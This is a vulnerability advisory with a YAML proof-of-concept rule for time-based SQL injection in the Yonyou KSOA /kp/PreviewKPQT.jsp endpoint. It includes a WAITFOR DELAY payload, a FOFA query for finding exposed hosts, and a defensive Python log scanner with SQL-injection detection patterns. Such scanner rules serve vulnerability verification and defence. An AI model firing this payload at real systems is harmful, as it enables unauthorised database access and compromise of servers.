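Vulnerability description
The /kp/PreviewKPQT.jsp endpoint of Yonyou Shikong KSOA (用友时空KSOA) is vulnerable to SQL injection. An attacker can exploit it to execute arbitrary SQL statements, for example to query data, download data, write a webshell, execute system commands, or bypass login restrictions.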
fofa: app="用友-时空KSOA"
id: yonyou-ksoa-previewkpqt-sqli

info:
  name: 用友时空KSOA系统接口PreviewKPQT.jsp-SQL注入漏洞
  author: avic123
  severity: critical
  verified: true
  description: |-
    用友时空KSOA接口 /kp/PreviewKPQT.jsp 接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
    fofa: app="用友-时空KSOA"
  reference:
    - https://blog.csdn.net/holyxp/article/details/132310244
  tags: yonyou,sqli
  created: 2025/03/21

rules:
  r0:
    request:
      method: GET
      path: /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--
    expression: |
      response.status == 200 && response.latency <= 7000 && response.latency >= 5000
  r1:
    request:
      method: GET
      path: /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A10%27--
    expression: |
      response.status == 200 && response.latency <= 12000 && response.latency >= 10000
  r2:
    request:
      method: GET
      path: /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--
    expression: |
      response.status == 200 && response.latency <= 7000 && response.latency >= 5000
  r3:
    request:
      method: GET
      path: /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A10%27--
    expression: |
      response.status == 200 && response.latency <= 12000 && response.latency >= 10000
expression: r0() && r1() && r2() && r3()
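
A defender-side check for the request pattern the rules above send, as an added example that is not part of the original PoC: it scans web access logs for requests to /kp/PreviewKPQT.jsp whose decoded KPQTID value contains SQL metacharacters or the WAITFOR/DELAY keywords. The access log format, the sample lines, the function names and the premise that a legitimate KPQTID is a plain identifier are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request-line portion of a common/combined access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
# Characters and keywords that have no place in an identifier-style parameter
# (assumption: legitimate KPQTID values are plain identifiers).
SUSPICIOUS_RE = re.compile(r"""['";]|--|/\*|\bwaitfor\b|\bdelay\b""", re.IGNORECASE)
ENDPOINT = "/kp/previewkpqt.jsp"


def suspicious_kpqtid(target):
    """Return the decoded KPQTID value if it looks like an injection attempt, else None."""
    parts = urlsplit(target)
    if parts.path.lower() != ENDPOINT:
        return None
    # parse_qs percent-decodes the value and turns '+' into a space.
    params = parse_qs(parts.query, keep_blank_values=True)
    for name, values in params.items():
        if name.lower() != "kpqtid":
            continue
        for value in values:
            if SUSPICIOUS_RE.search(value):
                return value
    return None


def scan(lines):
    """Yield (line_number, decoded_value) for each log line that trips the check."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = suspicious_kpqtid(match.group("target"))
        if value is not None:
            yield number, value


# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Mar/2025:10:00:01 +0800] "GET /kp/PreviewKPQT.jsp?KPQTID=1024 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/Mar/2025:10:00:05 +0800] "GET /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1" 200 5120',
    '192.0.2.10 - - [21/Mar/2025:10:00:09 +0800] "GET /index.jsp?q=it%27s HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious KPQTID = {value!r}")
```

The check decodes each value once, so double-encoded input needs a second decoding pass before matching.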